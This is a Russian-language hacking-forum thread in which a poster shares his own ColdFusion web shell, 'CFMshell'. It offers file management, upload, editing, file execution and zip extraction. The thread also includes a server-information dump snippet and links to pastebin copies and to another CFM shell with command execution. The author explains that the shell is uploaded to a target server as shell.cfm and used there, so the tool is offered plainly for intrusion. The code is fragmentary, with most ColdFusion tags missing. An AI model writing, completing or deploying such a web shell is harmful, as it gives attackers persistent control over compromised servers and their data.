ANTICHAT

ANTICHAT (https://forum.antichat.io/index.php)
-   Песочница (https://forum.antichat.io/forumdisplay.php?f=189)
-   -   CFMshell (https://forum.antichat.io/showthread.php?t=239916)

Seravin 05.11.2010 22:43

Облазив интернет в поисках cfm шелла, я так и не нашел ничего кроме одного шелла, который я думаю все знают: это шелл в котором можно запустить файл. Но в моём случае нельзя было запустить файлы, поэтому пришлось писать свой шелл.

CFMshell v. 1.0

- файлменеджер(удаление, переинование файлов/директорий, создание директорий)

- редактирование файлов

- заливка файлов

- запуск файлов

http://pastebin.com/hKS5k792

Код:


  td {border:1px solid black;}
  table {border-collapse: collapse;}
  #header {background-color: black;color:white;}
  #header td { border-color:white; }
  a {color:black}
 

       
               
               
                       
                       
               
                       
                               
                               
                       
                               
                                       
                                       
                               
                                       
                                               
                                                                                               
                                       
                                               
                                                       
                                                                                                               
                                               
                                               
                               
                       
               
       

       
       

       
       
       
       
               
               
               
                               
       
       

 

        #sc#

Current dirvalue = "#CP#"  >
Upload file
Create dir

Filename to exec:#CP#">
Options:

 NameSizeTypeModifiedAttrModeAction
 [..]

    [#directories.name#]
    #directories.size#
    #directories.type#
    #directories.dateLastModified#   
    #directories.attributes#
        #directories.mode#
        D   R

    #files.name#
    #files.size#
    #files.type#
    #files.dateLastModified#   
    #files.attributes#
        #files.mode#
        D   R

#CP#">

 #Fcont#

Save#getDirectoryFromPath(CP)#';document.frm.submit();">Back

З.Ы. сильно не пинайте, ибо coldfusion я не знаю совсем

Konqi 06.11.2010 00:17

лучше чем ничего, молодец

Seravin 23.11.2010 18:53

CFMshell v. 1.1

- устранил баг со слеширование на windows платформе(крокозяблы получались всякие)

- устарнил баг с просмотром файлов, если в них есть textarea

- добавил возможно разархивирования zip-архивов(CF 8+ если не ошибаюсь)

- сделал более приятный интерфейс

_http://pastebin.com/pu04UCq9

Код:


#rounded-corner {font-family: "Lucida Sans Unicode", "Lucida Grande", Sans-Serif;font-size: 12px;width: 100%;text-align: left;border-collapse: collapse;}
#current-path {font-family: "Lucida Sans Unicode", "Lucida Grande", Sans-Serif;font-size: 12px;width: 100%;text-align: left;border-collapse: collapse;margin:0px;margin-bottom:2px;padding:10px 0px;background:#b9c9fe}
#rounded-corner thead th.rounded-q1 {background: #b9c9fe;}
#rounded-corner thead th.rounded-q4 {background: #b9c9fe;width:100px}
#rounded-corner th {padding: 8px;font-weight: normal;font-size: 13px;color: #039;background: #b9c9fe;}
#rounded-corner td {padding: 8px;background: #e8edff;border-top: 1px solid #fff;color: #669;}
#rounded-corner tbody tr:hover td {background: #d0dafd;}
a {color:black}
 

       
               
               
                       
                       
               
                       
                               
                               
                       
                               
                                       
                                       
                               
                                       
                                               
                                                                                               
                                       
                                               
                                                       
                                                                                                               
                                               
                                               
                               
                       
               
       

       
       

       
       
       
       
               
               
               
                               
       
       

 

       
               
               
                       
               

        #sc#

Current dirvalue = "#CP#"  >
Upload file
Create dir

Filename to exec#CP#">
Options

Zip archive#CP#">
Folder to unpack#CP#">

NameSizeTypeModifiedAttributesModeAction
 [..]

    [#directories.name#]
    #directories.size#
    #directories.type#
    #directories.dateLastModified#   
    #directories.attributes#
        #directories.mode#
        Del   Rnm

    #files.name#
    #files.size#
    #files.type#
    #files.dateLastModified#   
    #files.attributes#
        #files.mode#
        Del   Rnm

#CP#

#CP#">

 #HTMLEditFormat(Fcont)#

Save#getDirectoryFromPath(CP)#';document.frm.submit();" style="width:100px">Back


andreipup 24.11.2010 02:35

Объясните как юзать его)?

Seravin 24.11.2010 03:17

эмм... а что непонятного? cfm -> coldfusion -> заливаем аля shell.cfm и юзаем

аналогия: php->php->заливаем wso2.php и юзаем

Seravin 09.01.2011 14:32

вывод информации о сервере(пока всё что нашёл)

Код:


        CGI server variable
        SERVER_SOFTWARE#CGI.SERVER_SOFTWARE#
        SERVER_NAME#CGI.SERVER_NAME#
        GATEWAY_INTERFACE#GATEWAY_INTERFACE#
        SERVER_PROTOCOL#CGI.SERVER_PROTOCOL#
        SERVER_PORT#CGI.SERVER_PORT#
        REQUEST_METHOD#CGI.REQUEST_METHOD#
        PATH_INFO#CGI.PATH_INFO#
        PATH_TRANSLATED#CGI.PATH_TRANSLATED#
        SCRIPT_NAME#CGI.SCRIPT_NAME#
        QUERY_STRING#CGI.QUERY_STRING#
        REMOTE_HOST#CGI.REMOTE_HOST#
        REMOTE_ADDR#CGI.REMOTE_ADDR#
        AUTH_TYPE#CGI.AUTH_TYPE#
        REMOTE_USER#CGI.REMOTE_USER#
        AUTH_USER#CGI.AUTH_USER#
        REMOTE_IDENT#CGI.REMOTE_IDENT#
        CONTENT_TYPE#CGI.CONTENT_TYPE#
        CONTENT_LENGTH#CGI.CONTENT_LENGTH#
        Server variables
        Product Name#Server.ColdFusion.ProductName#
        Product Level#Server.ColdFusion.ProductLevel#
        Supported Locales#Server.ColdFusion.SupportedLocales#
        OS Name#Server.OS.Name#
        OS Additional Information#Server.OS.AdditionalInformation#
        OS Version#Server.OS.Version#
        OS BuildNumber#Server.OS.BuildNumber#


Expl0ited 09.01.2011 14:40

Мне кажется проще использовать asp шелл, т.к. 90% coldfusion стоит на Windows платформах на которых крутится IIS (который без особых усилий работает с asp). Оставшиеся 10% стоят на linux из под apache и как это часто бывает с установленным php интерпретатором.

А вообще молодец, может и пригодится.

Konqi 19.10.2012 02:41

нашел очень неплохой шелл на cfm, автор "Sebastien Denis"

файловый менеджер, выполнение системных команд, выполнение запросов к базе. очень удобно вобщем. дерзайте

http://pastebin.com/jk9HPX3A


Время: 09:14